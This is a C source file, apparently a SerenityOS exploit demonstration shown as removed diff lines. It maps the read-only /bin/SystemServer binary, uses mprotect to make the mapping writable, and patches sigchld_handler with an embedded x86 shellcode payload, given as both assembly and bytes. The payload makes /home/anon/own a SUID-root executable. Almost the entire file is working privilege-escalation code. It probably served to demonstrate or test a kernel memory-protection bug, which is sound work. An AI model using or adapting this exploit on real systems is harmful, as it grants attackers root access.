12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970 |
- #include <AK/Types.h>
- #include <fcntl.h>
- #include <stdio.h>
- #include <string.h>
- #include <sys/mman.h>
- #include <unistd.h>
- int main()
- {
- int fd = open("/bin/SystemServer", O_RDONLY);
- if (fd < 0) {
- perror("open");
- return 1;
- }
- u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
- if (ptr == MAP_FAILED) {
- perror("mmap");
- return 1;
- }
- if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) {
- perror("mprotect");
- return 1;
- }
- /*
- *
- * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
- * It does two things:
- *
- * chown ("/home/anon/own", 0, 0);
- * chmod ("/home/anon/own", 04755);
- *
- * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
- *
- */
- #if 0
- [bits 32]
- [org 0x0804b111]
- jmp $+17
- path:
- db "/home/anon/own", 0
- mov eax, 79
- mov edx, path
- mov ecx, 0
- mov ebx, 0
- int 0x82
- mov eax, 67
- mov edx, path
- mov ecx, 15
- mov ebx, 2541
- int 0x82
- ret
- #endif
- const u8 payload[] = {
- 0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
- 0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
- 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
- 0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
- 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
- 0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
- };
- memcpy(&ptr[0x3111], payload, sizeof(payload));
- printf("ok\n");
- return 0;
- }
|